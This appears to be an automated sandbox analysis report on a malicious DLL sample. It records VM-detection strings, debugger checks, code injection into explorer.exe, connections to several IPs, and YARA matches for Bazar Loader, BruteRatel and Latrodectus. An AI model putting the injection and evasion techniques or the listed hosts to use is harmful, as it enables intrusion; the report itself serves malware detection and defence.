00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000016.00000002.2940539964.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: explorer.exe, 00000016.00000000.1849178409.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: explorer.exe, 00000016.00000000.1849178409.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 00000016.00000002.2940539964.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000016.00000002.2942821965.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\rundll32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00000001800118B8

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018000D1F4 GetLastError,IsDebuggerPresent,OutputDebugStringW,

6_2_000000018000D1F4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018001AC34 GetProcessHeap,

6_2_000000018001AC34

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00000001800118B8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000E470 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_000000018000E470
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000D638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018000D638

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 138.124.183.215 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 3.69.236.35 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 91.194.11.183 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 54.175.181.104 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 95.164.68.73 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.155 443	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe	Code function: 18_3_00007DF4F0240100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		18_3_00007DF4F0240100
Source: C:\Windows\System32\rundll32.exe	Code function: 18_2_000000026E7A1370 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,		18_2_000000026E7A1370

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 13A0000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 13A0000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 2580 base: 13A0000 value: 4D

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 6516	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 6516 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 13A0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1

Jump to behavior

Source: explorer.exe, 00000016.00000002.2942821965.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940227099.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000001800206B0 cpuid

6_2_00000001800206B0

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018000E5BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_000000018000E5BC

Source: C:\Windows\explorer.exe

Code function: 22_2_013A7318 GetUserNameA,wsprintfA,

22_2_013A7318

Source: C:\Windows\explorer.exe

Code function: 22_2_013ADB28 GetVersionExW,

22_2_013ADB28

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bazar Loader

Source: Yara match	File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bazar Loader

Source: Yara match	File source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected BruteRatel

Source: Yara match	File source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

ID:	1439879
Product:	CloudBasic
Start time:	00:03:08
Start date:	11.05.2024
Sample:	upfilles.dll.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ccb6d3cb020f56758622911ddd2f1fcb
SHA1:	4a013f752c2bf84ca37e418175e0d9b6f61f636d
SHA256:	f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
Filetype:	Win64 Dynamic Link Library (generic) (102004/3) 86.43%

Windows Analysis Report
upfilles.dll.dll

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_964e80f5d1a5f925558a7e6299462efecb949df_9db0ef65_6fb130ca-cac1-4736-bec2-e227247d8b1e\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	F38F1F5A2799280E9AE9ECAED3D4D7F2	614B13F3576A06B0A5D66A28720AD52CD48F64F1	73EACA5144E5222EA3859908633BE224CDF2CD699D28056A5D123197108AFA1D
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_964e80f5d1a5f925558a7e6299462efecb949df_9db0ef65_d9b8934c-437b-450d-af46-0185962b24b1\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	2A79D4F0CC409452333A8DDF84450AEF	512CBEAAAC2972AE331C435F33652DABEA99A541	3B527751CA5679B2B05D430B17ADDE2A98AFCC30216D6AA11E58AFF116A824B0
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_dc8a9dd96bb43aa654aa29aa9f464ac6a31131f_9db0ef65_7dc7f057-dc81-4d91-9caa-bd8701d223a3\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	02C2AE579A388FFA4C5C6A5104F49832	0C660AE3539AE95EDF65C53088E9DA7EB5DFFEC9	C313D051688A264AD7778F15CEC6ECB0D2FA908EA92D9134E25ED80B3B43C826
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_upf_dc8a9dd96bb43aa654aa29aa9f464ac6a31131f_9db0ef65_8641b0ad-46f6-452c-a496-10d58d4ec871\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	F9DA4317B3745718F8A31BB61F06A4F4	9BD89B72FF6CD9493B7343C4A720B403B54D0439	072151E64254174294A716437E4F986EC8336BAC545EBEA5D71EC5A481A00DBD
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D40.tmp.dmp	Mini DuMP crash report, 14 streams, Fri May 10 22:04:02 2024, 0x1205a4 type	677694119DA44E5FEC7BF1C1317E830B	4FEB41E3E2792D4305F3FD66F5EE17E8BFFDA32D	13C9DE6CF736408ECF3F5D8B186442A3381B005B307FDBD5DCEB114A627866FB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DFD.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	80B9B0AFA9ABA69B9A78557C448086C5	B99101A8A598F674B85334D5F8A0609AC22631E6	9968C12422E570B5EE4916B7EDF4BC0240E72DE23F62EF10630EC4B1E51814FF
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E1D.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	5D367A225C41966DC6550185A90DAE6F	101CC4DF6477453EA9552B5AD0EE1273F1599AEA	E6997AC198F3DBE27F9915E0C4A3CC5E65654C6536885480C9BC6EF40290C190
C:\ProgramData\Microsoft\Windows\WER\Temp\WER389A.tmp.dmp	Mini DuMP crash report, 14 streams, Fri May 10 22:04:05 2024, 0x1205a4 type	CAAA37C00D8ECF6FA5FC4FA2A30BD2FA	2F9D061ED037ECE51B72AC937A99813073410435	ECA00EFCB890B105FA3A548999F1E7A161FD7BDB5ED7B1F2FF2240DF570C41E2
C:\ProgramData\Microsoft\Windows\WER\Temp\WER38DA.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	B607A2EB5584FD30993D12ABB2C4DF8A	F2E1E2CE69FB5F3AB9850FF3A56668B6DFAE0AFF	DC1BDEED634E5907DFD137282558057ED000A00CD7BABC1ABC665D6B47410064
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3919.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	76611ED68AE98A3C1C5418DA42AD9839	E56614DC31056975565348CCA2BC464DC61B1657	1E7C757B8CED61BB0960A6FD8EE447BE3D82DF516B6DBF0CD4E9DD3CD465F897
C:\ProgramData\Microsoft\Windows\WER\Temp\WER459B.tmp.dmp	Mini DuMP crash report, 14 streams, Fri May 10 22:04:08 2024, 0x1205a4 type	66F2A3C376DA0D558312FF6110D838C3	834B317025A81AA5E7F00DF4430D56F7D760645B	562F917C37C8D1E62F2E934483DEF3B9032D3EDBDE40154FD19E1CEA1BE2BAF2
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4619.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	B71FE5E91F46A2F6E80793B28555315E	52F0EE991F743BEA0995768C5AA075635A979098	7F8F6E795A696CA77E094A9664C2A6B795FFB3C2E9A5A6AEF1ED303C408F7EA0
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4648.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	DA7D9A451274291EFD3755DC8FC3A141	51E42DA26BBC94435F94EFDBDF8A242CC744E57C	821799E5797BB8E3BCB45C123C170C09004DB0C21BB4FC46A6F6A99DE66FFC12
